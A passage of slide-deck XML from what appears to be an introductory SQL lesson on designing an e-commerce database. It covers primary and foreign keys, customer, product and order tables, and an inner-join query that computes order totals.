          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PK = Primary Key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FK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (int unsigned) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - - - - - - - - - – &gt; PK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (int unsigned)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What is unsigned word?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unsigned means only positive number</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	1,2,3,4,5,6,7,.........</a:t>
            </a:r>
            <a:endParaRPr/>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7" name="Shape 2907"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2908" name="Google Shape;2908;p471"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="849000" y="218413"/>
            <a:ext cx="74460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rPr>
              <a:t>Ecommerce Database</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2909" name="Google Shape;2909;p471"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409550" y="1053125"/>
            <a:ext cx="8328000" cy="4001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6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Customers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table2)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id,fName,sName,address</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Products (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table3)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id,Pname,pdesc,price 100.50 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>DECIMAL(</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Orders (Joining table1)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which Customer (FK)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which Product    (FK)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quantity</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>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472"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413825" y="5202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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to join multiple tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2915" name="Google Shape;2915;p472"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="754038" y="2054313"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1145625"/>
                <a:gridCol w="1432775"/>
                <a:gridCol w="1094925"/>
                <a:gridCol w="1306450"/>
                <a:gridCol w="1014600"/>
                <a:gridCol w="1014600"/>
                <a:gridCol w="998350"/>
              </a:tblGrid>
              <a:tr h="444400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1500"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="850">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>CustomerID</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="850">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="76200" marB="76200" marR="76200" marL="152400"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="850">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>CustomerName</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="850">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Address</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="850">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="850">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Product</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="850">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="850">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Price</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="850">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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 sz="850">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Qty</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="850">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdan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850">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Total</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="850">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Verdana"/>
                        <a:ea typeface="Verdana"/>
                        <a:cs typeface="Verdana"/>
                        <a:sym typeface="Verdana"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="955075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900"/>
                        <a:t>ANIL DOLOR</a:t>
                      </a:r>
                      <a:endParaRPr sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900"/>
                        <a:t>Abc</a:t>
                      </a:r>
                      <a:endParaRPr sz="900"/>
                    </a:p>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rPr lang="en" sz="900"/>
                        <a:t>Dell Laptop</a:t>
                      </a:r>
                      <a:endParaRPr sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900"/>
                        <a:t>20000</a:t>
                      </a:r>
                      <a:endParaRPr sz="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900"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr sz="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t>100000</a:t>
                      </a:r>
                      <a:endParaRPr sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="9E9E9E"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="341050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr sz="9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Robert Vadra</a:t>
                      </a:r>
                      <a:endParaRPr sz="900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>123,xyz</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a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Mouse</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 sz="900">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>500</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:schemeClr val="dk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900">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</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1000</a:t>
                      </a:r>
                      <a:endParaRPr sz="900">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>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2916" name="Google Shape;2916;p472"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315375" y="1230413"/>
            <a:ext cx="74460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rPr>
              <a:t>Final Output of Ecommerce Database</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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0" name="Shape 2920"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2921" name="Google Shape;2921;p473"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1952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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to join multiple tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2922" name="Google Shape;2922;p473"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087300" y="859038"/>
            <a:ext cx="74460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rPr>
              <a:t>Final Output of Ecommerce Database</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2923" name="Google Shape;2923;p473"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="93975" y="1840350"/>
            <a:ext cx="8875800" cy="23118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 sz="1600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select customer_tbl.id,concat(customer_tbl.fname," ",customer_tbl.sname) as CustomerName,customer_tbl.address,order_tbl.qty,product_tbl.pname,product_tbl.price, order_tbl.qty*product_tbl.price as Total  from order_tbl inner join customer_tbl inner join product_tbl on order_tbl.cust_id=customer_tbl.id and order_tbl.prod_id=product_tbl.id;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="6AA84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69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="191200" y="1247925"/>
            <a:ext cx="8854450" cy="2272875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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7" name="Shape 2927"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
